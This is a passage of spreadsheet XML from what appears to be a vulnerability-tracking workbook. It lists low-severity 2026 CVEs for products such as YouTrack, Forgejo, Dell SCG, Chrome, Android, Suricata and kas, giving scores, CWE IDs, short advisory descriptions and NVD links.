        </is>
      </c>
      <c r="J5820" s="5" t="inlineStr"/>
      <c r="K5820" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5820" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.18634 stored XSS was possible via project and organization icon uploads</t>
        </is>
      </c>
      <c r="M5820" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86491</t>
        </is>
      </c>
    </row>
    <row r="5821">
      <c r="A5821" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5821" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89151</t>
        </is>
      </c>
      <c r="C5821" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="D5821" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5821" s="5" t="inlineStr"/>
      <c r="F5821" s="5" t="inlineStr"/>
      <c r="G5821" s="5" t="inlineStr"/>
      <c r="H5821" s="5" t="inlineStr"/>
      <c r="I5821" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J5821" s="5" t="inlineStr"/>
      <c r="K5821" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L5821" s="5" t="inlineStr">
        <is>
          <t>Forgejo before 16.0.4 allows use of restricted API tokens for unintended access to the "allow maintainer edit" feature.</t>
        </is>
      </c>
      <c r="M5821" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89151</t>
        </is>
      </c>
    </row>
    <row r="5822">
      <c r="A5822" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5822" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79693</t>
        </is>
      </c>
      <c r="C5822" s="5" t="n">
        <v>3.4</v>
      </c>
      <c r="D5822" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5822" s="5" t="inlineStr"/>
      <c r="F5822" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5822" s="5" t="inlineStr"/>
      <c r="H5822" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I5822" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5822" s="5" t="inlineStr"/>
      <c r="K5822" s="5" t="inlineStr">
        <is>
          <t>CWE-272</t>
        </is>
      </c>
      <c r="L5822" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains a Least Privilege Violation vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to unauthorized access.</t>
        </is>
      </c>
      <c r="M5822" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79693</t>
        </is>
      </c>
    </row>
    <row r="5823">
      <c r="A5823" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5823" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79942</t>
        </is>
      </c>
      <c r="C5823" s="5" t="n">
        <v>3.4</v>
      </c>
      <c r="D5823" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5823" s="5" t="inlineStr"/>
      <c r="F5823" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5823" s="5" t="inlineStr"/>
      <c r="H5823" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I5823" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5823" s="5" t="inlineStr"/>
      <c r="K5823" s="5" t="inlineStr">
        <is>
          <t>CWE-250</t>
        </is>
      </c>
      <c r="L5823" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Execution with Unnecessary Privileges vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to unauthorized access.</t>
        </is>
      </c>
      <c r="M5823" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79942</t>
        </is>
      </c>
    </row>
    <row r="5824">
      <c r="A5824" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5824" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79944</t>
        </is>
      </c>
      <c r="C5824" s="5" t="n">
        <v>3.4</v>
      </c>
      <c r="D5824" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5824" s="5" t="inlineStr"/>
      <c r="F5824" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5824" s="5" t="inlineStr"/>
      <c r="H5824" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I5824" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5824" s="5" t="inlineStr"/>
      <c r="K5824" s="5" t="inlineStr">
        <is>
          <t>CWE-272</t>
        </is>
      </c>
      <c r="L5824" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains a Least Privilege Violation vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to unauthorized access.</t>
        </is>
      </c>
      <c r="M5824" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79944</t>
        </is>
      </c>
    </row>
    <row r="5825">
      <c r="A5825" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5825" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87456</t>
        </is>
      </c>
      <c r="C5825" s="5" t="n">
        <v>3.4</v>
      </c>
      <c r="D5825" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5825" s="5" t="inlineStr"/>
      <c r="F5825" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5825" s="5" t="inlineStr"/>
      <c r="H5825" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5825" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5825" s="5" t="inlineStr"/>
      <c r="K5825" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="L5825" s="5" t="inlineStr">
        <is>
          <t>Uninitialized resource in Media in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to read memory outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M5825" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87456</t>
        </is>
      </c>
    </row>
    <row r="5826">
      <c r="A5826" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5826" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87576</t>
        </is>
      </c>
      <c r="C5826" s="5" t="n">
        <v>3.4</v>
      </c>
      <c r="D5826" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5826" s="5" t="inlineStr"/>
      <c r="F5826" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5826" s="5" t="inlineStr"/>
      <c r="H5826" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="I5826" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5826" s="5" t="inlineStr"/>
      <c r="K5826" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="L5826" s="5" t="inlineStr">
        <is>
          <t>Uninitialized resource in GPU in Google Chrome on on Android prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to read memory outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M5826" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87576</t>
        </is>
      </c>
    </row>
    <row r="5827">
      <c r="A5827" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5827" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87647</t>
        </is>
      </c>
      <c r="C5827" s="5" t="n">
        <v>3.4</v>
      </c>
      <c r="D5827" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5827" s="5" t="inlineStr"/>
      <c r="F5827" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5827" s="5" t="inlineStr"/>
      <c r="H5827" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5827" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5827" s="5" t="inlineStr"/>
      <c r="K5827" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="L5827" s="5" t="inlineStr">
        <is>
          <t>Uninitialized resource in GPU in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to read memory outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M5827" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87647</t>
        </is>
      </c>
    </row>
    <row r="5828">
      <c r="A5828" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5828" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0054</t>
        </is>
      </c>
      <c r="C5828" s="5" t="n">
        <v>3.3</v>
      </c>
      <c r="D5828" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5828" s="5" t="inlineStr"/>
      <c r="F5828" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5828" s="5" t="inlineStr"/>
      <c r="H5828" s="5" t="inlineStr"/>
      <c r="I5828" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5828" s="5" t="inlineStr"/>
      <c r="K5828" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5828" s="5" t="inlineStr">
        <is>
          <t>In isCallerAllowed of WalletContextualLocationsService.kt, there is a possible way to get wallet information due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M5828" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0054</t>
        </is>
      </c>
    </row>
    <row r="5829">
      <c r="A5829" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5829" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17483</t>
        </is>
      </c>
      <c r="C5829" s="5" t="n">
        <v>3.3</v>
      </c>
      <c r="D5829" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5829" s="5" t="inlineStr"/>
      <c r="F5829" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5829" s="5" t="inlineStr">
        <is>
          <t>ibm, db2</t>
        </is>
      </c>
      <c r="H5829" s="5" t="inlineStr">
        <is>
          <t>ibm:db2_mirror_for_i</t>
        </is>
      </c>
      <c r="I5829" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J5829" s="5" t="inlineStr"/>
      <c r="K5829" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="L5829" s="5" t="inlineStr">
        <is>
          <t>IBM Db2 Mirror for i 7.4, 7.5, and 7.6 IBM i could allow a local attacker to delete historical flight-recorder archives due to improper access control in an SQL procedure.</t>
        </is>
      </c>
      <c r="M5829" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17483</t>
        </is>
      </c>
    </row>
    <row r="5830">
      <c r="A5830" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5830" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28582</t>
        </is>
      </c>
      <c r="C5830" s="5" t="n">
        <v>3.3</v>
      </c>
      <c r="D5830" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5830" s="5" t="inlineStr"/>
      <c r="F5830" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5830" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5830" s="5" t="inlineStr"/>
      <c r="I5830" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5830" s="5" t="inlineStr"/>
      <c r="K5830" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5830" s="5" t="inlineStr">
        <is>
          <t>In onCreate of ConfirmDeviceCredentialActivity.java, there is a possible unauthorized access to and modification of device credentials due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M5830" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28582</t>
        </is>
      </c>
    </row>
    <row r="5831">
      <c r="A5831" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5831" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28622</t>
        </is>
      </c>
      <c r="C5831" s="5" t="n">
        <v>3.3</v>
      </c>
      <c r="D5831" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5831" s="5" t="inlineStr"/>
      <c r="F5831" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5831" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5831" s="5" t="inlineStr"/>
      <c r="I5831" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5831" s="5" t="inlineStr"/>
      <c r="K5831" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5831" s="5" t="inlineStr">
        <is>
          <t>In getQueryBuilderInternal of MediaProvider.java, there is a possible way to retrieve location metadata due to a permissions bypass. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M5831" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28622</t>
        </is>
      </c>
    </row>
    <row r="5832">
      <c r="A5832" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5832" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28623</t>
        </is>
      </c>
      <c r="C5832" s="5" t="n">
        <v>3.3</v>
      </c>
      <c r="D5832" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5832" s="5" t="inlineStr"/>
      <c r="F5832" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5832" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5832" s="5" t="inlineStr"/>
      <c r="I5832" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5832" s="5" t="inlineStr"/>
      <c r="K5832" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5832" s="5" t="inlineStr">
        <is>
          <t>In writeToParcel of BleRssiRangingCapabilities.java, there is a possible way to obtain the Bluetooth MAC address due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M5832" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28623</t>
        </is>
      </c>
    </row>
    <row r="5833">
      <c r="A5833" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5833" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28630</t>
        </is>
      </c>
      <c r="C5833" s="5" t="n">
        <v>3.3</v>
      </c>
      <c r="D5833" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5833" s="5" t="inlineStr"/>
      <c r="F5833" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5833" s="5" t="inlineStr"/>
      <c r="H5833" s="5" t="inlineStr"/>
      <c r="I5833" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5833" s="5" t="inlineStr"/>
      <c r="K5833" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="L5833" s="5" t="inlineStr">
        <is>
          <t>In onCreate of ContactsPickerActivity.kt, there is a possible misleading UI due to a tapjacking/overlay attack. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M5833" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28630</t>
        </is>
      </c>
    </row>
    <row r="5834">
      <c r="A5834" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5834" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28638</t>
        </is>
      </c>
      <c r="C5834" s="5" t="n">
        <v>3.3</v>
      </c>
      <c r="D5834" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5834" s="5" t="inlineStr"/>
      <c r="F5834" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5834" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5834" s="5" t="inlineStr"/>
      <c r="I5834" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5834" s="5" t="inlineStr"/>
      <c r="K5834" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L5834" s="5" t="inlineStr">
        <is>
          <t>In multiple functions of XmpDataParser.java, there is a possible improper data sanitization due to a logic error in the code. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M5834" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28638</t>
        </is>
      </c>
    </row>
    <row r="5835">
      <c r="A5835" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5835" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28660</t>
        </is>
      </c>
      <c r="C5835" s="5" t="n">
        <v>3.3</v>
      </c>
      <c r="D5835" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5835" s="5" t="inlineStr"/>
      <c r="F5835" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5835" s="5" t="inlineStr"/>
      <c r="H5835" s="5" t="inlineStr"/>
      <c r="I5835" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5835" s="5" t="inlineStr"/>
      <c r="K5835" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L5835" s="5" t="inlineStr">
        <is>
          <t>In getAllSessions of multiple files, there is a possible confused deputy due to a logic error in the code. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M5835" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28660</t>
        </is>
      </c>
    </row>
    <row r="5836">
      <c r="A5836" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5836" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28671</t>
        </is>
      </c>
      <c r="C5836" s="5" t="n">
        <v>3.3</v>
      </c>
      <c r="D5836" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5836" s="5" t="inlineStr"/>
      <c r="F5836" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5836" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5836" s="5" t="inlineStr"/>
      <c r="I5836" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5836" s="5" t="inlineStr"/>
      <c r="K5836" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="L5836" s="5" t="inlineStr">
        <is>
          <t>In updateInternal of MediaProvider.java, there is a possible expose contents of files due to a race condition. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M5836" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28671</t>
        </is>
      </c>
    </row>
    <row r="5837">
      <c r="A5837" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5837" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38093</t>
        </is>
      </c>
      <c r="C5837" s="5" t="n">
        <v>3.3</v>
      </c>
      <c r="D5837" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5837" s="5" t="inlineStr"/>
      <c r="F5837" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5837" s="5" t="inlineStr"/>
      <c r="H5837" s="5" t="inlineStr"/>
      <c r="I5837" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J5837" s="5" t="inlineStr"/>
      <c r="K5837" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L5837" s="5" t="inlineStr">
        <is>
          <t>file_picker (aka flutter_file_picker) for Flutter, all versions through 10.3.10, is vulnerable to path traversal (CWE-22) in its Android implementation. The openFileStream() method in FileUtils.kt uses the DISPLAY_NAME obtained from ContentResolver.query() directly in file path construction without sanitization. A malicious Android app with a crafted ContentProvider can return a filename containing ../ sequences, causing the plugin to create arbitrary files and directories outside the intended cache directory within the victim app's internal storage. Existing files are not overwritten due to an existence check.</t>
        </is>
      </c>
      <c r="M5837" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38093</t>
        </is>
      </c>
    </row>
    <row r="5838">
      <c r="A5838" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5838" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45519</t>
        </is>
      </c>
      <c r="C5838" s="5" t="n">
        <v>3.3</v>
      </c>
      <c r="D5838" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5838" s="5" t="inlineStr"/>
      <c r="F5838" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5838" s="5" t="inlineStr"/>
      <c r="H5838" s="5" t="inlineStr"/>
      <c r="I5838" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5838" s="5" t="inlineStr"/>
      <c r="K5838" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="L5838" s="5" t="inlineStr">
        <is>
          <t>In screenArgsForPermissionCheckIfAny of multiple locations there is a possible risk of unauthorized access due to a confused deputy. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M5838" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45519</t>
        </is>
      </c>
    </row>
    <row r="5839">
      <c r="A5839" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5839" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45521</t>
        </is>
      </c>
      <c r="C5839" s="5" t="n">
        <v>3.3</v>
      </c>
      <c r="D5839" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5839" s="5" t="inlineStr"/>
      <c r="F5839" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5839" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5839" s="5" t="inlineStr"/>
      <c r="I5839" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5839" s="5" t="inlineStr"/>
      <c r="K5839" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L5839" s="5" t="inlineStr">
        <is>
          <t>In openFile of AppFuseBridge.java, there is a possible information disclosure due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M5839" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45521</t>
        </is>
      </c>
    </row>
    <row r="5840">
      <c r="A5840" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5840" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45525</t>
        </is>
      </c>
      <c r="C5840" s="5" t="n">
        <v>3.3</v>
      </c>
      <c r="D5840" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5840" s="5" t="inlineStr"/>
      <c r="F5840" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5840" s="5" t="inlineStr"/>
      <c r="H5840" s="5" t="inlineStr"/>
      <c r="I5840" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5840" s="5" t="inlineStr"/>
      <c r="K5840" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L5840" s="5" t="inlineStr">
        <is>
          <t>In multiple locations, there is a possible improper data sanitization due to a logic error in the code. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M5840" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45525</t>
        </is>
      </c>
    </row>
    <row r="5841">
      <c r="A5841" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5841" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45761</t>
        </is>
      </c>
      <c r="C5841" s="5" t="n">
        <v>3.3</v>
      </c>
      <c r="D5841" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5841" s="5" t="inlineStr"/>
      <c r="F5841" s="5" t="inlineStr"/>
      <c r="G5841" s="5" t="inlineStr"/>
      <c r="H5841" s="5" t="inlineStr"/>
      <c r="I5841" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J5841" s="5" t="inlineStr"/>
      <c r="K5841" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L5841" s="5" t="inlineStr">
        <is>
          <t>Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. Prior to versions 7.0.16 and 8.0.5, a crafted rule using mixed-case frame syntax could trigger a heap buffer overflow while Suricata is loading signatures. The issue is reached during rule parsing/loading rather than by network traffic alone. Versions 7.0.16 and 8.0.5 contain a fix. As a workaround, preprocess rules to check that frames are all lowercase and/or only load trusted rulesets.</t>
        </is>
      </c>
      <c r="M5841" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45761</t>
        </is>
      </c>
    </row>
    <row r="5842">
      <c r="A5842" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5842" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54548</t>
        </is>
      </c>
      <c r="C5842" s="5" t="n">
        <v>3.3</v>
      </c>
      <c r="D5842" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5842" s="5" t="inlineStr"/>
      <c r="F5842" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5842" s="5" t="inlineStr"/>
      <c r="H5842" s="5" t="inlineStr"/>
      <c r="I5842" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J5842" s="5" t="inlineStr"/>
      <c r="K5842" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L5842" s="5" t="inlineStr">
        <is>
          <t>kas is a setup tool for bitbake based projects. Prior to 5.4, internal SSH key setup triggered by SSH_PRIVATE_KEY or SSH_PRIVATE_KEY_FILE creates ~/.ssh/config when no user-specific SSH configuration exists and adds a global Host * rule containing StrictHostKeyChecking no. In kas/libcmds.py, ssh_no_host_key_check() runs without checking ctx.managed_env, so the setting persists after kas exits and affects future SSH sessions by the same local user, extending beyond the intended short-lived continuous integration environment. A later SSH connection can therefore accept an attacker-controlled host key without verification, increasing the risk of a man-in-the-middle attack that compromises session confidentiality or integrity. This issue is fixed in version 5.4.</t>
        </is>
      </c>
      <c r="M5842" s="6" t="inlineStr">
